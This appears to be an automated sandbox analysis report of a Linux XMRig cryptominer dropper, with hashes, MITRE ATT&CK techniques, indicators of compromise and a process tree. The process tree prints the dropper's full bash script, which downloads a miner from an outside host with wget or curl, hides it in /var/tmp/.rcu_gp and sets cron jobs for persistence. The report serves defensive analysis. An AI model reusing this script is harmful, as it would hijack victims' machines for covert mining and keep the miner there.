xmrig | 864a395c401c668ac8e23aa27eb4bc281e3734d4eafc29178174d79bae48a173

Analysis

max time kernel
149s
max time network
149s
platform
ubuntu-24.04_amd64
resource
ubuntu2404-amd64-20240523-en
resource tags

arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
submitted
30-10-2024 15:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

.main.elf
Size

918KB
MD5

1b1445cab8443509f13769a3c479404f
SHA1

9b1fcc3637f92d8fa281f7ab2243cb382f4be285
SHA256

864a395c401c668ac8e23aa27eb4bc281e3734d4eafc29178174d79bae48a173
SHA512

1555c924ad0b94e1189eebe6c091282a9f65d82a46af1cc02f994fc2efdfe0e3de278ad0aa9e699733530c3b654e4249e8b045a2b0690d0a3cd97b0ff99adedb
SSDEEP

12288:3LCQ0Bliw+6jJlLBkVVXNaasdLg3HLsyRE+9buxxRHKyyubFkDfHx:3LCQ01+6jJHkVVXMasdLg3LZNb0vkT

Score

10^/10

xmrig xmrig_linux antivm defense_evasion discovery execution miner persistence privilege_escalatio

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
/var/tmp/.rcu_gp/.report_system	family_xmrig
/var/tmp/.rcu_gp/.report_system	xmrig

Xmrig family
xmrig
Xmrig_linux family
xmrig_linux
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
defense_evasion

Linux and Mac File and Directory Permissions Modification
T1222.002

Processes:

chmodbashchmod

pid process

2478 chmod
2451 bash
2476 chmod

pid	process
2478	chmod
2451	bash
2476	chmod

Executes dropped EXE 56 IoCs

Processes:

diicot.report_systemdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicotdiicot

ioc	pid	process
/var/tmp/.rcu_gp/diicot	2489	diicot
/var/tmp/.rcu_gp/.report_system	2491	.report_system
/var/tmp/.rcu_gp/diicot	2503	diicot
/var/tmp/.rcu_gp/diicot	2509	diicot
/var/tmp/.rcu_gp/diicot	2515	diicot
/var/tmp/.rcu_gp/diicot	2521	diicot
/var/tmp/.rcu_gp/diicot	2527	diicot
/var/tmp/.rcu_gp/diicot	2533	diicot
/var/tmp/.rcu_gp/diicot	2540	diicot
/var/tmp/.rcu_gp/diicot	2549	diicot
/var/tmp/.rcu_gp/diicot	2555	diicot
/var/tmp/.rcu_gp/diicot	2561	diicot
/var/tmp/.rcu_gp/diicot	2567	diicot
/var/tmp/.rcu_gp/diicot	2573	diicot
/var/tmp/.rcu_gp/diicot	2579	diicot
/var/tmp/.rcu_gp/diicot	2585	diicot
/var/tmp/.rcu_gp/diicot	2591	diicot
/var/tmp/.rcu_gp/diicot	2597	diicot
/var/tmp/.rcu_gp/diicot	2603	diicot
/var/tmp/.rcu_gp/diicot	2609	diicot
/var/tmp/.rcu_gp/diicot	2615	diicot
/var/tmp/.rcu_gp/diicot	2621	diicot
/var/tmp/.rcu_gp/diicot	2627	diicot
/var/tmp/.rcu_gp/diicot	2633	diicot
/var/tmp/.rcu_gp/diicot	2639	diicot
/var/tmp/.rcu_gp/diicot	2645	diicot
/var/tmp/.rcu_gp/diicot	2651	diicot
/var/tmp/.rcu_gp/diicot	2657	diicot
/var/tmp/.rcu_gp/diicot	2663	diicot
/var/tmp/.rcu_gp/diicot	2669	diicot
/var/tmp/.rcu_gp/diicot	2675	diicot
/var/tmp/.rcu_gp/diicot	2681	diicot
/var/tmp/.rcu_gp/diicot	2687	diicot
/var/tmp/.rcu_gp/diicot	2693	diicot
/var/tmp/.rcu_gp/diicot	2699	diicot
/var/tmp/.rcu_gp/diicot	2705	diicot
/var/tmp/.rcu_gp/diicot	2711	diicot
/var/tmp/.rcu_gp/diicot	2717	diicot
/var/tmp/.rcu_gp/diicot	2723	diicot
/var/tmp/.rcu_gp/diicot	2729	diicot
/var/tmp/.rcu_gp/diicot	2735	diicot
/var/tmp/.rcu_gp/diicot	2741	diicot
/var/tmp/.rcu_gp/diicot	2747	diicot
/var/tmp/.rcu_gp/diicot	2753	diicot
/var/tmp/.rcu_gp/diicot	2759	diicot
/var/tmp/.rcu_gp/diicot	2780	diicot
/var/tmp/.rcu_gp/diicot	2786	diicot
/var/tmp/.rcu_gp/diicot	2792	diicot
/var/tmp/.rcu_gp/diicot	2798	diicot
/var/tmp/.rcu_gp/diicot	2807	diicot
/var/tmp/.rcu_gp/diicot	2813	diicot
/var/tmp/.rcu_gp/diicot	2819	diicot
/var/tmp/.rcu_gp/diicot	2825	diicot
/var/tmp/.rcu_gp/diicot	2831	diicot
/var/tmp/.rcu_gp/diicot	2837	diicot
/var/tmp/.rcu_gp/diicot	2843	diicot

Checks hardware identifiers (DMI) 1 TTPs 4 IoCs

Checks DMI information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/sys_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_vendor	.report_system

Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
execution persistence privilege_escalatio

Cron
T1053.003

Processes:

crontab

description ioc process

File opened for modification /var/spool/cron/crontabs/tmp.bKFdNi crontab
Enumerates running processes
Discovers information about currently running processes on the system

description	ioc	process
File opened for modification	/var/spool/cron/crontabs/tmp.bKFdNi	crontab

Reads hardware information 1 TTPs 14 IoCs

Accesses system info like serial numbers, manufacturer names etc.

discovery

System Information Discovery

T1082

Processes:

.report_system

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/board_name	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_type	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_date	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_serial	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_vendor	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/bios_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/board_asset_tag	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/chassis_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_version	.report_system
File opened for reading	/sys/devices/virtual/dmi/id/product_uuid	.report_system

Checks CPU configuration 1 TTPs 1 IoCs
Checks CPU information which indicate if the system is a virtual machine.
antivm

System Checks
T1497.001

Processes:

.report_system

description ioc process

File opened for reading /proc/cpuinfo .report_system

description	ioc	process
File opened for reading	/proc/cpuinfo	.report_system

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

Processes:

.report_systempgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgrep

description	ioc	process
File opened for reading	/sys/devices/system/cpu/cpu0/topology/package_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/cpuinfo_max_freq	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index7/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index6/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpu_capacity	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/type	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/id	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/number_of_sets	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/physical_line_partition	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/type	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index4/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cpufreq/base_frequency	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/online	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0/coherency_line_size	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index8/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1/level	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2/id	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index9/shared_cpu_map	.report_system
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/possible	pgrep
File opened for reading	/sys/devices/system/cpu/cpu0/topology/core_cpus	.report_system
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3/size	.report_system

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

Processes:

pgreppgreppgreppgrep.report_systempgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgrep

description	ioc	process
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/access0/initiators/read_bandwidth	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/access1/initiators	.report_system
File opened for reading	/sys/firmware/dmi/tables/smbios_entry_point	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/online	.report_system
File opened for reading	/sys/bus/dax/devices	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-1048576kB/nr_hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/fs/cgroup/cpuset.cpus.effective	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/cpu	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/access0/initiators	.report_system
File opened for reading	/sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages	.report_system
File opened for reading	/sys/devices/system/node/node0/cpumap	.report_system
File opened for reading	/sys/devices/virtual/dmi/id	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/fs/cgroup/cgroup.controllers	.report_system
File opened for reading	/sys/fs/cgroup/cpuset.mems.effective	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node/node0/meminfo	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/kernel/mm/hugepages	.report_system
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep
File opened for reading	/sys/devices/system/node	pgrep

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgreppgrep

description	ioc	process
File opened for reading	/proc/822/cgroup	pgrep
File opened for reading	/proc/1888/cmdline	pgrep
File opened for reading	/proc/189/cmdline	pgrep
File opened for reading	/proc/2207/cmdline	pgrep
File opened for reading	/proc/1916/cmdline	pgrep
File opened for reading	/proc/1058/cgroup	pgrep
File opened for reading	/proc/1651/ctty	pgrep
File opened for reading	/proc/2447/status	pgrep
File opened for reading	/proc/1638/stat	pgrep
File opened for reading	/proc/28/stat	pgrep
File opened for reading	/proc/2178/cmdline	pgrep
File opened for reading	/proc/1065/cmdline	pgrep
File opened for reading	/proc/13/cmdline	pgrep
File opened for reading	/proc/1396/stat	pgrep
File opened for reading	/proc/537/cgroup	pgrep
File opened for reading	/proc/5/stat	pgrep
File opened for reading	/proc/200/status	pgrep
File opened for reading	/proc/53/cgroup	pgrep
File opened for reading	/proc/69/stat	pgrep
File opened for reading	/proc/197/ctty	pgrep
File opened for reading	/proc/34/cmdline	pgrep
File opened for reading	/proc/2032/status	pgrep
File opened for reading	/proc/34/cgroup	pgrep
File opened for reading	/proc/2458/cgroup	pgrep
File opened for reading	/proc/2092/cmdline	pgrep
File opened for reading	/proc/7/stat	pgrep
File opened for reading	/proc/2449/stat	pgrep
File opened for reading	/proc/2096/cmdline	pgrep
File opened for reading	/proc/2178/cgroup	pgrep
File opened for reading	/proc/1940/status	pgrep
File opened for reading	/proc/2172/status	pgrep
File opened for reading	/proc/275/cgroup	pgrep
File opened for reading	/proc/1751/cmdline	pgrep
File opened for reading	/proc/2160/status	pgrep
File opened for reading	/proc/49/cmdline	pgrep
File opened for reading	/proc/2161/stat	pgrep
File opened for reading	/proc/17/cgroup	pgrep
File opened for reading	/proc/2195/status	pgrep
File opened for reading	/proc/1888/status	pgrep
File opened for reading	/proc/1958/stat	pgrep
File opened for reading	/proc/1926/ctty	pgrep
File opened for reading	/proc/40/cgroup	pgrep
File opened for reading	/proc/55/cgroup	pgrep
File opened for reading	/proc/2069/cgroup	pgrep
File opened for reading	/proc/1058/ctty	pgrep
File opened for reading	/proc/8/status	pgrep
File opened for reading	/proc/51/status	pgrep
File opened for reading	/proc/124/status	pgrep
File opened for reading	/proc/1046/status	pgrep
File opened for reading	/proc/2092/stat	pgrep
File opened for reading	/proc/2449/cmdline	pgrep
File opened for reading	/proc/1988/status	pgrep
File opened for reading	/proc/1638/stat	pgrep
File opened for reading	/proc/26/cmdline	pgrep
File opened for reading	/proc/1122/cgroup	pgrep
File opened for reading	/proc/2449/stat	pgrep
File opened for reading	/proc/1865/stat	pgrep
File opened for reading	/proc/31/status	pgrep
File opened for reading	/proc/276/ctty	pgrep
File opened for reading	/proc/1916/cgroup	pgrep
File opened for reading	/proc/1940/ctty	pgrep
File opened for reading	/proc/43/ctty	pgrep
File opened for reading	/proc/195/ctty	pgrep
File opened for reading	/proc/20/ctty	pgrep

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:2451

/bin/bash
/tmp/.main.elf -c "exec '/tmp/.main.elf' \"\$@\"" /tmp/.main.elf
1⤵
PID:2451

/tmp/.main.elf
/tmp/.main.elf
1⤵
PID:2451

/bin/bash
/tmp/.main.elf -c " #!/bin/bash RCU_GP_DIR=\"/var/tmp/.rcu_gp\" REPORT_SYSTEM_URL=\"http://xkobeimparatu.net/.puscarie/.report_system\" DIICOT_FILE=\"diicot\" setup_report_system() { if [ ! -d \"\$RCU_GP_DIR\" ]; then mkdir \"\$RCU_GP_DIR\" fi cd \"\$RCU_GP_DIR\" || exit if command -v wget &> /dev/null; then wget \"\$REPORT_SYSTEM_URL\" -O .report_system elif command -v curl &> /dev/null; then curl -o .report_system \"\$REPORT_SYSTEM_URL\" else echo \"Nu s-a gasit nici wget, nici curl\" exit 1 fi chmod +x .report_system cd - || exit } create_diicot_file() { DIICOT_PATH=\"\$RCU_GP_DIR/\$DIICOT_FILE\" cat <<EOL > \"\$DIICOT_PATH\" #!/bin/bash if ! pgrep -x .report_system >/dev/null; then /var/tmp/.rcu_gp/./.report_system> /dev/null 2>&1 & disown \$* else : fi EOL chmod +x \"\$DIICOT_PATH\" } setup_cron_jobs() { locatie=\"\$RCU_GP_DIR\" locatie2=\"\$PWD\" if [ ! -f \"\$locatie/.ps4\" ]; then echo \"\$locatie\" > \"\$locatie/.ps4\" fi if ! crontab -l | grep -q '.main'; then rm -rf \"\$locatie/.ps5\" echo \"@daily \$locatie/\$DIICOT_FILE\" >> \"\$locatie/.ps5\" sleep 1 echo \"@reboot \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 echo \"@monthly \$locatie2/.main > /dev/null 2>&1 & disown\" >> \"\$locatie/.ps5\" sleep 1 crontab \"\$locatie/.ps5\" sleep 1 rm -rf \"\$locatie/.ps5\" fi } setup_report_system create_diicot_file setup_cron_jobs while : do \$(cat /var/tmp/.rcu_gp/.ps4)/diicot setup_cron_jobs sleep 2.5 done echo \"Merge bn mineru serifule\" " /tmp/.main.elf
1⤵
- File and Directory Permissions Modification
PID:2451
- /usr/bin/mkdir
  mkdir /var/tmp/.rcu_gp
  2⤵
  PID:2453
- /usr/bin/wget
  wget http://xkobeimparatu.net/.puscarie/.report_system -O .report_system
  2⤵
  PID:2454
- /usr/bin/chmod
  chmod +x .report_system
  2⤵
  - File and Directory Permissions Modification
  PID:2476
- /usr/bin/cat
  cat
  2⤵
  PID:2477
- /usr/bin/chmod
  chmod +x /var/tmp/.rcu_gp/diicot
  2⤵
  - File and Directory Permissions Modification
  PID:2478
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2479
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2480
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:2481
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:2482
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:2483
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:2484
- /usr/bin/crontab
  crontab /var/tmp/.rcu_gp/.ps5
  2⤵
  - Creates/modifies Cron job
  PID:2485
- /usr/bin/sleep
  sleep 1
  2⤵
  PID:2486
- /usr/bin/rm
  rm -rf /var/tmp/.rcu_gp/.ps5
  2⤵
  PID:2487
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2488
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2489
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2490
- - /var/tmp/.rcu_gp/.report_system
    /var/tmp/.rcu_gp/./.report_system
    3⤵
    - Executes dropped EXE
    - Checks hardware identifiers (DMI)
    - Reads hardware information
    - Checks CPU configuration
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2491
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2492
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2493
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2494
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2502
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2503
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    PID:2504
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2505
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2506
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2507
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2508
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2509
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2510
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2511
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2512
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2513
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2514
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2515
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2516
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2517
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2518
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2519
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2520
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2521
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2522
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2523
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2524
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2525
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2526
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2527
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2528
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2529
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2530
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2531
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2532
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2533
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2534
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2535
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2536
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2537
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2539
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2540
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2541
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2542
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2543
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2544
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2548
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2549
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    PID:2550
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2551
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2552
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2553
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2554
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2555
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads runtime system information
    PID:2556
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2557
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2558
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2559
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2560
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2561
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2562
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2563
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2564
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2565
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2566
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2567
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Reads CPU attributes
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:2568
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2569
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2570
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2571
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
  2⤵
  PID:2572
- /var/tmp/.rcu_gp/diicot
  /var/tmp/.rcu_gp/diicot
  2⤵
  - Executes dropped EXE
  PID:2573
- - /usr/bin/pgrep
    pgrep -x .report_system
    3⤵
    - Enumerates kernel/hardware configuration
    PID:2574
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:2575
- /usr/bin/grep
  grep -q .main
  2⤵
  PID:2576
- /usr/bin/sleep
  sleep 2.5
  2⤵
  PID:2577
- /usr/bin/cat
  cat /var/tmp/.rcu_gp/.ps4
